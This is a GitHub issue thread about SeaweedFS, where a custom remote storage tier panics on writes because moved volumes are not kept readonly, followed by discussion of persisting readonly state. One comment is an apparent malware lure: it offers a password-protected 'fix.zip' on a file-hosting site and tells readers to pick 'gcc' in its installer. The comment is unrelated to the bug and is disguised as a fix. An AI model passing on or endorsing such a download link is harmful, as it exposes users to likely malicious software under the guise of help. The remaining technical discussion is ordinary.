### ISSUE TITLE
panic WriteAt remote storage

### ISSUE THREAD

**Issue by half-life666** [seaweedfs/seaweedfs#5950]
**Describe the bug**
We've implemented a remote storage tier which is similar to `S3BackendStorage`, but when the volume is moved to the new backend, the volume is still not in readonly state, then when there are new filer writes, it will still choose the volume which already moved to remote storage as target, since we copied the WriteAt implementation at s3 storage:
```go
func (s3backendStorageFile S3BackendStorageFile) WriteAt(p []byte, off int64) (n int, err error) {
	panic("not implemented")
}
```
so the new write will hit panic.

**System Setup**
- List the command line to start "weed master", "weed volume", "weed filer", "weed s3", "weed mount".
- OS version
- output of `weed version`
version 30GB 3.72  linux amd64

- if using filer, show the content of `filer.toml`

**Expected behavior**
A new write should not choose the volume which moved to remote backend storage.

**Screenshots**

**Additional context**
I think this can linked to the readonly state.

When a volume becomes full, it will enter readonly state, or this can be done by volume server `VolumeMarkReadonly` API. Volume moved to remote storage tier can use readonly state as well, to enter the state of immutability.

However, this readonly state is not persisted by seaweed, after master restart, this volume could be writable again. 

So the question is why seaweedfs does not persist the volume readonly state? I think persist the readonly state in volume header can solve this problem well.

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chrislusf** [comment]
remote volume is not writeable. only deletion can work.

can you make this a reproducible case?

**Comment by half-life666** [comment]
Below is a high level process we have done to manage the data move between home tier (the current seaweed storage) and tier storage:

1. Look at volumes, if quiet period is over some threshold, we will copy the volume dat to remote storage, before copy, `VolumeMarkReadonly` is called, the assumption here is to make sure the immutability of the volume, and later we find this assumption is not valid.
2. Wait for some time when we see the volume server file system is becoming full, e.g., over 80% used
3. Use the remote storage backend Upload API to upload the volume to remote storage, actually since the volume already copied to remote storage for safety, so the upload does nothing, but the backend storage tiering logic will remove the volume dat file, and persist the volume info to vif file.

so we understand our problem here is we didnt do `VolumeMarkReadonly` right before upload, which may lead to filer choose the volume which is uploaded to remote storage.

However, there is still potential problems for volume not persist readonly state, I will open a new issue to discuss.
